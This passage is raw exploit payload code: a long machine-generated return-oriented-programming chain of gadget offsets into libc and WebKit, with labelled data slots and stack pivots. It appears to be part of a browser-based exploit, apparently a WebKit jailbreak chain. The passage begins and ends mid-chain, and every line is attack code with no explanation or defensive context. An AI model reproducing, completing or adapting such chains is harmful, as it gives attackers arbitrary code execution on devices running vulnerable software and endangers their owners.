//pop rsi ropchain+188416, //L3027 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3027: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3028: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3029: db([10, 0]); // 0xa set_gadget(libc_base+763368,); //pop rcx //L3030: db([10, 0]); // 0xa set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+10973692, //imul rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+188616, //L3031 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3031: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3033: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+188736, //L3036 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+188720, //L3034 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3034: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3036: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+188816, //L3037 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+188832, //L3038 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3037: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3038: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+188976, //L3041 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+188944, //L3039 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+188960, //L3040 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3039: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3040: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3041: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+189064, //L3043 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L3042: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L3043: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+189152, //L3044 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3044: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3046: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+189272, //L3049 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+189256, //L3047 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3047: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3049: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+189360, //L3050 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+189376, //L3052 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L3050: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3052: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+189432, //L3053 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3053: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+189624, //L3056 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+189640, //L3057 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+189608, //L3055 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3055: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3056: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3057: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+189800, //L3061 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+189768, //L3059 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+189784, //L3060 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3058: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3059: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3060: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3061: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+189856, //L3063 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3063: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+189984, //L3065 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+190000, //L3066 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+189968, //L3064 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3064: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3065: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3066: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+190160, //L3070 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+190128, //L3068 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+190144, //L3069 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3067: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3068: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3069: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3070: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+190216, //L3072 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3072: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+190344, //L3074 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+190360, //L3075 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+190328, //L3073 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3073: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3074: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3075: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+190520, //L3079 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+190488, //L3077 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+190504, //L3078 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3076: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3077: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3078: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3079: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+190576, //L3081 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3081: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+190704, //L3083 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+190720, //L3084 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+190688, //L3082 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3082: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3083: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3084: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+190816, //L3086 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+190800, //L3085 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3085: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3086: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3087: db([48, 0]); // 0x30 set_gadget(libc_base+763368,); //pop rcx //L3088: db([48, 0]); // 0x30 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+191040, //L3090 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+191056, //L3091 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+191024, //L3089 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3089: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3090: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3091: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+191168, //L3092 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+191200, //L3094 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+191184, //L3093 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3092: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3093: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3094: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+191344, //L3097 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+191328, //L3096 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3095: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3096: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3097: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+191408, //L3098 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3098: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3100: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+191488, //L3102 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3102: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+191528, //L3101 //L3011: libc_base+782311, //pop rsp ropchain+191544, //L3104 //L3101: libc_base+782311, //pop rsp ropchain+185640, //L2957 //L3104: libc_base+764760, //pop rsi ropchain+191584, //L3105 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3105: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3107: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+191704, //L3110 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+191688, //L3108 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3108: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3110: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+191880, //L3113 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+191896, //L3114 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+191848, //L3111 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+191864, //L3112 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3111: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3112: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3113: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3114: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+192056, //L3118 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+192024, //L3116 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+192040, //L3117 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3115: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3116: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3117: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3118: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+192176, //L3119 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+192208, //L3121 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+192192, //L3120 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3119: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3120: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3121: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+192312, //L3122 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+192328, //L3123 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L3122: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3123: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+192448, //L3124 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+192432, //L3125 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L3125: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L3124: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+192536, //L3127 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+192520, //L3126 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3126: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3127: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+192640, //L3128 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+192656, //L3129 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L3128: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3129: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+192776, //L3130 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+192760, //L3131 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L3131: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L3130: db([0, 0]); // 0x0 //__out_rev: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+192848, //L3133 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L3133: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+192912, //L3135 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L3135: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([16, 0]); // 0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3136: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3138: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+193080, //L3141 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+193064, //L3139 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3139: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3141: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+193168, //L3142 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+193184, //L3144 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3142: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3144: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3145: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L3147: db([72, 0]); // 0x48 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+193344, //L3150 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+193328, //L3148 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3148: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3150: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+193520, //L3153 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+193536, //L3154 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+193488, //L3151 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+193504, //L3152 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3151: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3152: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3153: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3154: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+193632, //L3156 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+193616, //L3155 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3155: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3156: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3157: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3158: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L3159: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+193832, //L3161 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3161: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+193888, //L3162 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3162: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+194024, //L3166 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+194008, //L3165 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3164: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3165: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3166: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+194144, //L3169 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+194112, //L3167 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3167: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3168: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3169: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+194280, //L3171 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+194296, //L3172 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+194264, //L3170 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3170: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3171: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3172: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+194456, //L3177 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+194472, //L3178 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+194408, //L3174 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3174: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3175: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3176: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3177: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3178: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+194584, //L3179+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov 